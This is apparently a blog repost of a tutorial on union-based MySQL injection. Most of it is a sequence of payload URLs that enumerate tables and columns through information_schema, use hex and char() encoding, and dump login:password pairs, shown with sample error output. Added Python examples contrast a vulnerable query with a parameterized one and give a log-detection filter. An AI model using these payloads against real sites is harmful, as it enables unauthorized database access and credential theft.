We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique)
Today I am proudly sharing an article written by Mr. Rafael Souza, one of the great admirers and fans of VOGH, who has gladly shared his brilliant research paper on SQL Injection (MySQL) with us. Rafael is very passionate about the cyber security domain; he is keenly involved with the GreyHat Community and is the design maintainer of the Brazilian Backtrack Team. So, without wasting time, let's go and see what Rafael has for us:
Discover The Infamous MySQL Injection Technique
Understand the technique MySQL Injection:
Searching Column(s) of a given table
It is known that computers and software are developed and designed by humans, and human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behaviour of that mental response. Put more comprehensively: we humans tend to err, and for this very reason we are the greatest tool for finding these errors; even the software used for analysis and vulnerability scanning was built and improved by us.
Understand the technique MySQL Injection:
One of the attack techniques best known to web developers is SQL Injection: the manipulation of an SQL statement through the variables that make up the parameters received by a server-side script. It is a class of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when an attacker can insert a series of SQL statements into a query by manipulating the input data of an application.
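As an added example (not part of Rafael's paper), here is the lookup behind a query.php-style parameter written two ways in Python: first with the parameter pasted into the SQL text, then with it bound as a parameter. SQLite is used in place of MySQL because it ships with Python, sqlite_master stands in for information_schema.tables, and the tables and rows are constructed for the example.

```python
"""Vulnerable and hardened forms of the same lookup (added example, constructed data).
The payload has the shape shown in the paper: a closing value followed by
'union all select ...' that appends a second SELECT against the catalogue."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: a public 'news' table and a private 'usuarios' table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT, tag TEXT);
        CREATE TABLE usuarios (id INTEGER, login TEXT, passwd TEXT, texto TEXT);
        INSERT INTO news VALUES (1, 'hello', 'first post', 'admin', 'misc');
        INSERT INTO usuarios VALUES (1, '_Rafa_', 'fontes1337', 'x');
    """)
    return con


def lookup_vulnerable(con: sqlite3.Connection, string: str) -> list:
    """Mirrors query.php?string=...: the parameter becomes part of the SQL text."""
    sql = "SELECT id, title, body, author, tag FROM news WHERE id = " + string
    return con.execute(sql).fetchall()


def lookup_safe(con: sqlite3.Connection, string: str) -> list:
    """Same query with a bound parameter: the value is compared as data, never parsed as SQL."""
    sql = "SELECT id, title, body, author, tag FROM news WHERE id = ?"
    return con.execute(sql, (string,)).fetchall()


# Payload in the paper's shape; sqlite_master plays the role of information_schema.tables.
PAYLOAD = ("1 union all select 1,2,3,4,group_concat(name) "
           "from sqlite_master where type='table'--")

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, PAYLOAD))  # second row carries 'news,usuarios'
    print(lookup_safe(db, PAYLOAD))        # [] : no row has an id equal to the payload text
```

The hardened form also keeps working for legitimate input: lookup_safe(db, "1") still returns the news row, because the driver converts the bound text to a number when comparing it with the integer column.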
(Figure 1) Detecting
Searching the column number(s): we test first for an error; when the query no longer errors, the number of columns has been found.
(Figure 2) SQL Error
Host Information: the version of MySQL used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database of the connection between the application's input and the MySQL system.
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This applies to versions below 5.x.y, which have no information_schema to query.
(Figure 7) Testing
Dump: this works in versions 5.x.y and above [ 1º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1
[ 2º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
Unknown column 'CHARACTER_SETS' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
Unknown column 'COLLATIONS' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
Unknown column 'usuarios' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
Unknown column 'rafael' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
Searching Column(s) of a given table
* Brute Force / Shooting: works in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
Unknown column '_Rafa_' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
Unknown column 'rafael1337' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1
Works in versions 5.x.y and above [ 1º Method ]
"usuarios" hexadecimal -> "7573756172696f73"
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
Unknown column 'login,passwd,id,texto' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1
[ 2º Method ]
"usuarios" decimal -> "117,115,117,97,114,105,111,115"
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
Unknown column 'login' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
Unknown column 'passwd' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
Unknown column 'id' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
Unknown column 'text' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
Data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from
_Rafa_ : fontes1337
Unknown column '_Rafa_ : fontes1337' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from
_RHA_ : infosec1337
Unknown column '_RHA_ : infosec1337' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1
group_concat() => fetch everything you want, with ASCII characters
concat() => fetch what you want, with ASCII characters
=> unite
0x3a => :
0x20 => space
0x2d => -
0x2b => +
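As an added defender-side example (not from the original paper), the Python filter below decodes the encodings listed above (0x hex literals, char() byte lists and URL escaping) before matching, so that an encoded table name cannot hide the union / information_schema shape of a request from a log review. The access-log lines and the indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed indicator set: (name, pattern), run over the decoded, lower-cased query string.
INDICATORS = [
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema-probe", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("row-collapse", re.compile(r"\b(group_concat|concat_ws|concat)\s*\(")),
    ("comment-tail", re.compile(r"(--|#)\s*$")),
]

def decode_literals(query: str) -> str:
    """Resolve 0xHEX and char(n,n,...) into the text MySQL would build from them."""
    def from_hex(m):
        digits = m.group(1)
        if len(digits) % 2:            # odd nibble count: left-pad so fromhex accepts it
            digits = "0" + digits
        return bytes.fromhex(digits).decode("latin-1")
    def from_char(m):
        return "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1)))
    query = re.sub(r"\b0x([0-9a-fA-F]+)", from_hex, query)
    query = re.sub(r"\bchar\(([\d\s,]+)\)", from_char, query, flags=re.IGNORECASE)
    return query

def classify(line: str) -> list:
    """Indicator names triggered by one access-log line; an empty list means clean."""
    m = re.search(r'"(?:GET|POST)\s+\S*\?(\S+)\s+HTTP', line)
    if not m:
        return []
    query = decode_literals(unquote_plus(m.group(1))).lower()
    return [name for name, pat in INDICATORS if pat.search(query)]

# Constructed sample lines in common log format; the payloads follow the shapes shown above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2012:10:00:00 +0000] "GET /query.php?string=7 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2012:10:00:03 +0000] "GET /query.php?string=1%20union%20all%20select%201,2,3,4,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573756172696f73-- HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2012:10:00:07 +0000] "GET /query.php?string=1+union+all+select+1,2,3,4,concat(column_name)+from+information_schema.columns+where+table_name%3Dchar(117,115,117,97,114,105,111,115)+limit+0,1-- HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or "clean")
```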
This article is for educational purposes only; I could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of such tampering can be unauthorized access to a restricted area, imperceptible to the eye of an inexperienced developer; it may also allow the deletion of a table, compromising the entire application, among other consequences. So I want to emphasize that this paper is for security researchers and developers, so that they are aware and test their code.
Companies are placing important information on their websites and in their databases, and information, although intangible, is the most valuable asset. The question is: how are developers dealing with this huge responsibility?
The challenge is to develop increasingly innovative sites, coupled with mechanisms that provide security to users.
The purpose of this paper is to present what SQL Injection is, how applications are exploited, and techniques for testing it, allowing the developer to build a more robust system and understand the vulnerability.
I hope you all enjoy the above article, as I did. On behalf of the entire VOGH Team, I sincerely thank Mr. Rafael Souza for his remarkable contribution.
To get more such exclusive research papers, along with all kinds of breaking cyber updates from across the globe, just stay tuned with VOGH.